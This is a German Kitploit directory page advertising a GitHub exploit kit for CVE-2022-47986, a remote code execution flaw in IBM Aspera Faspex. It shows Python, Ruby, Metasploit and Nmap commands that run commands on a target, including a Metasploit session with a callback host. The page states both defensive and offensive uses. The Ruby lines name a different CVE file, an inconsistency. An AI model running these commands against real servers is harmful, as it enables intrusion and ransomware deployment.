Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-47986 — CVE-2022-47986: Python-, Ruby-, NMAP- und Metasploit-Module zur Ausnutzung der Schwachstelle. | Kitploit
Tools/GitHubGitHub/mauricelambert/cve-2022-47986
Exploit-FrameworksExploitationWebanwendungs-Exploitation
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986: Python-, Ruby-, NMAP- und Metasploit-Module zur Ausnutzung der Schwachstelle.

Repository anzeigen
212vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-47986

Warum

Diese Schwachstelle wird aktiv ausgenutzt. IceFire nutzt diese Schwachstelle, um Ransomware auf Zielsystemen zu deployen. Ich möchte SOC/Blue Teams helfen, betroffene Systeme zu identifizieren, und Pentestern/Red Teams, diese auszunutzen und zu melden.

Beschreibung

Ich stelle reine Python- und Ruby-Skripte sowie Metasploit- und Nmap-Module zur Verfügung, um die Schwachstelle auszunutzen, die eine RCE (Remote Code Execution) auf IBM Aspera Faspex durch YAML-Deserialisierung verursacht.

Exploit: RCE (Remote Code Execution)

Python

root@kitploit:~
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

root@kitploit:~
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

root@kitploit:~
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

Quellen

  • IBM
  • nvd.nist.gov
  • Blog - Exploit
  • thehackernews - exploited by icefire
  • thehackernews - CISA KEV catalog

Lizenz

Lizenziert unter der GPL, Version 3.

Tool herunterladen